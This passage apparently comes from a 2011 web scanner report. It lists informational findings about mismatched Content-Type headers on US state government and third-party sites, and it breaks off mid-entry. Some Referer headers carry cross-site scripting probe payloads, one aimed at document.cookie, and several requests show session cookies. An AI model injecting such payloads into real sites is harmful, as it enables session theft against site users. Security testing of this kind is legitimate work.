Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 53208
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 14:20:17 GMT
Accept-Ranges: bytes
ETag: "def7803be64cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:03 GMT

.PNG
.
...IHDR.......w.......j(....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..L...Lb.Vmj....AIDATx^l...\W...gUu..%......RJ.TJ....bfF.,..l......].=.=3=3..{.LCU.._.
...[SNIP]...

30.190. http://mibid.bidcorp.com/Auctions/Files/Auction_28084/thumbnail/dvd1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28084/thumbnail/dvd1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28084/thumbnail/dvd1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 21506
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 15:21:15 GMT
Accept-Ranges: bytes
ETag: "2df8b8bfee4cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:00 GMT

.PNG
.
...IHDR.......1.....s..Y....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..<e..;..k"`...SkIDATx^m........H..X.'.....&.l6.qw!!    I...^.PZ.xq/...    !...P.
...{.g....
...[SNIP]...

30.191. http://mibid.bidcorp.com/Auctions/Files/Auction_28086/thumbnail/img_1031.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28086/thumbnail/img_1031.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28086/thumbnail/img_1031.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 41099
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 15:31:19 GMT
Accept-Ranges: bytes
ETag: "4f88628f04cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:00 GMT

.PNG
.
...IHDR..............#s1....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs.........t..K....IDATx^..w.UU..K....s......s.."g..(9..T.1..1b..A....9......w.y.......1
...[SNIP]...

30.192. http://mibid.bidcorp.com/Auctions/Files/Auction_28089/thumbnail/img_1034.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28089/thumbnail/img_1034.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28089/thumbnail/img_1034.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 36989
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 16:51:46 GMT
Accept-Ranges: bytes
ETag: "967e2665fb4cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:02 GMT

.PNG
.
...IHDR..............#s1....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs.........t..K....IDATx^.}...W....]..r.9..sN#.r..,.H.g.s...l..    ...G.c....8b.s.    .....;.V
...[SNIP]...

30.193. http://mibid.bidcorp.com/Auctions/Files/Auction_28090/thumbnail/cam1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28090/thumbnail/cam1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28090/thumbnail/cam1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 28019
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 18:18:40 GMT
Accept-Ranges: bytes
ETag: "86b58e8875cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:02 GMT

.PNG
.
...IHDR.......>.......1.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..4]..3....8&..l.IDATx^M.u.....[....w..F'1.KR.T..*..,..$..l...X..333333[fH..I..?...}..
...[SNIP]...

30.194. http://mibid.bidcorp.com/Auctions/Files/Auction_28092/thumbnail/misc1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mibid.bidcorp.com
Path:   /Auctions/Files/Auction_28092/thumbnail/misc1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Auctions/Files/Auction_28092/thumbnail/misc1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mibid.bidcorp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 29427
Content-Type: image/jpeg
Last-Modified: Wed, 27 Apr 2011 19:02:42 GMT
Accept-Ranges: bytes
ETag: "9e81acafd5cc1:11ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:01 GMT

.PNG
.
...IHDR.......A.....x.......sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...    pHYs..4...3........r\IDATx^U.w.U...[
..2"..9.*.
P@..(r.9...(g    e!... @".,    .(.{ow......g...v
...[SNIP]...

30.195. https://moversguide.usps.com/icoa/flow.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://moversguide.usps.com
Path:   /icoa/flow.do

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /icoa/flow.do HTTP/1.1
Host: moversguide.usps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:23:20 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Length: 9281
Set-Cookie: JSESSIONID=00007vT2kFY8XM1A5vHT9odUlIA:137elttnv; Path=/
Keep-Alive: timeout=10, max=3
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: NSC_fbh-nh-qspe-xfc-443=ffffffff3b2217ab45525d5f4f58455e445a4a4212d3;Version=1;path=/;secure;httponly


<?xml version="1.0" encoding="UTF-8" ?>


<html>
<head>
<meta name="title" content="USPS - MoversGuide">
<meta name="author" content="USPS, Imagitas.">

...[SNIP]...

30.196. http://newbrowse.livehelper.com/servlet/a  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://newbrowse.livehelper.com
Path:   /servlet/a

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /servlet/a HTTP/1.1
Host: newbrowse.livehelper.com
Proxy-Connection: keep-alive
Referer: http://newbrowse.livehelper.com/servlet/lhBrowsea0096%3Cimg%20src%3da%20onerror%3dalert(1)%3E006acc3c9a9?ACTION=BTNREFRESH&RND=0.4528236691839993&p=Iowa.gov&c=1099892&b=company&g=Information%2520Services&op=&PAGEVISIT=true&r=1.442691869335249&a=Netscape&v=5&pl=Win32&dm=ia.gov&rf=http%3A//ia.gov/&tl=Iowa.gov%20LiveHelp&cs=true&pg=http%3A//ia.gov/livehelp.html&sd1=1156x1920&sd2=16&jsv=undefined&ps=&lot=1304161964473&ll=undefined&LC=1&pullFailed=0&nocache=0.2693614396266639&id=0&noCacheIE=1304161981692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: st1099892=135396595z2011-04-30 06:12:09z; searsTest=TEST

Response

HTTP/1.1 404 Not found
Server: nginx/0.7.65
Date: Sat, 30 Apr 2011 11:55:15 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 50

Error. The file was not found. (servlet name = a)

30.197. http://nj.gov/nj/images/library/com/com_211_new2.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://nj.gov
Path:   /nj/images/library/com/com_211_new2.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /nj/images/library/com/com_211_new2.gif HTTP/1.1
Host: nj.gov
Proxy-Connection: keep-alive
Referer: http://nj.gov/nj/community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3007478048.30148287:lv=1304117395706:ss=1304117395706

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 29 Apr 2011 22:49:49 GMT
Content-length: 4743
Content-type: image/gif
Last-modified: Wed, 25 Nov 2009 03:44:29 GMT
Etag: "1287-4b0ca81d"
Accept-ranges: bytes

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................>....
...[SNIP]...

30.198. https://njmvcscheduling.state.nj.us/tc/driverlogin.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://njmvcscheduling.state.nj.us
Path:   /tc/driverlogin.do

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tc/driverlogin.do HTTP/1.1
Host: njmvcscheduling.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:23:49 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8e
Set-Cookie: JSESSIONID=0000g2fKkgZ8he6Dg09OilhxQLU:-1;Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500: Cannot find bean business_UserContext in scope session

30.199. http://nv.gov/RSSFeed.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://nv.gov
Path:   /RSSFeed.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /RSSFeed.aspx HTTP/1.1
Host: nv.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=nv.gov&SiteLanguage=1033; EktGUID=e1ffd717-3c01-4362-9a5b-89256133fb8e; EkAnalytics=newuser; ASP.NET_SessionId=f4dzvey4cafeqrfxihsuhw45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:24:09 GMT
Connection: close
Content-Length: 267

<?xml version="1.0" ?> <rss xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0"><channel><link>http://nv.gov/RSSFeed.aspx</link><descriptio
...[SNIP]...

30.200. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonEnabled.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/images/buttonEnabled.png

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /onestop-main/OneStop/images/buttonEnabled.png HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/plain
date: Sat, 30 Apr 2011 12:27:41 GMT
last-modified: Wed, 16 Mar 2011 20:21:40 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 120

.PNG
.
...IHDR...............a....    pHYs................*IDAT..U.1
.0.......... .b.&...zl..jg..y.I.e.5...p.....IEND.B`.

30.201. https://onestop.michigan.gov/onestop-main/OneStop/images/buttonHover.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/images/buttonHover.png

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /onestop-main/OneStop/images/buttonHover.png HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
connection: close
content-language: en-US
content-type: text/plain
date: Sat, 30 Apr 2011 12:28:52 GMT
last-modified: Wed, 16 Mar 2011 20:21:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 144

.PNG
.
...IHDR.............2:r#....tEXtSoftware.Adobe ImageReadyq.e<...2IDAT..]...0..@...9..G.R.+...k\.MN8..3?../.\....-.&Y7....4....IEND.B`.

30.202. http://oregon.gov/js/oc-resources/marquee.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oregon.gov
Path:   /js/oc-resources/marquee.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /js/oc-resources/marquee.js HTTP/1.1
Host: oregon.gov
Proxy-Connection: keep-alive
Referer: http://oregon.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:15:52 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 26 Oct 2006 17:02:40 GMT
ETag: "8c5b80-1a96-420b9c56aec00"
Accept-Ranges: bytes
Content-Length: 6806
Cache-Control: max-age=28800
Expires: Sat, 30 Apr 2011 19:15:52 GMT
Content-Type: application/x-javascript

if(!window.vdt_doc_effects)vdt_doc_effects=new Object();z1=false;z2=null;z3=new Object();vs_timers=new Object();z4=false;ulm_base="http://www.opencube.com/vim5.1/";ulm_ie=window.showHelp;ulm_opera=win
...[SNIP]...

30.203. https://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /serve/fb/pdc HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: uid=1_1304111927_1304111927683:2889978505427215; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: kwd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: sit=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: cre=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: bpd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: apd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: scg=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: ppd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: afl=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:18:47 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- site #0 *not* found -->

30.204. https://seal.verisign.com/getseal  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://seal.verisign.com
Path:   /getseal

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 12:25:12 GMT
Connection: close

<!-- x=1; -->

30.205. http://serverapi.arcgisonline.com/jsapi/arcgis/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://serverapi.arcgisonline.com
Path:   /jsapi/arcgis/

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /jsapi/arcgis/ HTTP/1.1
Host: serverapi.arcgisonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public,public
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 30 Apr 2011 12:28:17 GMT
Expires: Sun, 29 Apr 2012 10:46:09 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Content-Length: 79
Connection: Close

Could not find a part of the path 'C:\inetpub\wwwroot\js\dojo\dojo\dojo.xd.js'.

30.206. http://services.ito.state.il.us/agencycomponents/getBPFeatures.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://services.ito.state.il.us
Path:   /agencycomponents/getBPFeatures.cfm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /agencycomponents/getBPFeatures.cfm HTTP/1.1
Host: services.ito.state.il.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server:
Date: Sat, 30 Apr 2011 12:28:18 GMT
X-Powered-By: ASP.NET
Connection: close
Content-type: text/html
Page-Completion-Status: Normal


               document.write("<script>var featuresErrorMsg=\"Error: Agency Code for dynamic State Features is missing.\";var amberAlertSampleText=\"\\n\\nThis is the dynamic Amber Alert sample aler
...[SNIP]...

30.207. http://shots.snap.com/snap_shots.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /snap_shots.js HTTP/1.1
Host: shots.snap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:28:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Fri, 30-Apr-2010 12:28:18 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D6c2fde5507cb316f585add6ac2aa00a9%26exp%3D1367152099%26v%3D2%26origin%3Dshots; expires=Sun, 28-Apr-2013 12:28:19 GMT; path=/; domain=.snap.com
Content-Length: 15083
Cache-Control: max-age=7200
Expires: Sat, 30 Apr 2011 14:28:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...

30.208. http://thumbnail.api.livestream.com/thumbnail  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thumbnail.api.livestream.com
Path:   /thumbnail

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /thumbnail HTTP/1.1
Host: thumbnail.api.livestream.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=utf-8
Content-Length: 24
Server: Livestream HTTP/1.0
Vary: Accept-Encoding
Cache-Control: max-age=20
Date: Sat, 30 Apr 2011 12:28:38 GMT
Connection: close

<h1>400 Bad Request</h1>

30.209. http://tn.gov/includes/alert/alert.shtml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tn.gov
Path:   /includes/alert/alert.shtml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /includes/alert/alert.shtml HTTP/1.1
Host: tn.gov
Proxy-Connection: keep-alive
Referer: http://tn.gov/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.1.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:08 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 87
Content-Type: text/html; charset=UTF-8


<!-- NO ALERT INCLUDES -->
<div class="alert"> <!-- Alert div do not change -->
</div>

30.210. https://treas-secure.treas.state.mi.us/eservice_enu/images/mich_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/images/mich_2.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /eservice_enu/images/mich_2.gif HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: https://treas-secure.treas.state.mi.us/eservice_enu/start.swe?SWENeedContext=false&SWECmd=GetCachedFrame&W=t&SWEACn=4532&_sn=BDkjKBekpE2aQW.txkaeXqJWDwtWzC4yVeCYeVfD9oE_&SWEC=1&SWEFrame=top._sweclient._swepage2&SWEBID=-1&SWETS=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sn=BDkjKBekpE2aQW.txkaeXqJWDwtWzC4yVeCYeVfD9oE_

Response

HTTP/1.1 200 OK
Content-Length: 5315
Content-Type: image/gif
Last-Modified: Tue, 08 May 2007 21:30:45 GMT
Accept-Ranges: bytes
ETag: "8070f722b891c71:b3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:32:02 GMT
Connection: close

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......d...................................
...[SNIP]...

30.211. http://twitter.com/statuses/user_timeline/IDAHOgov.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twitter.com
Path:   /statuses/user_timeline/IDAHOgov.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /statuses/user_timeline/IDAHOgov.json?callback=twitterCallback2&count=1 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://idaho.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:09:49 GMT
Server: hi
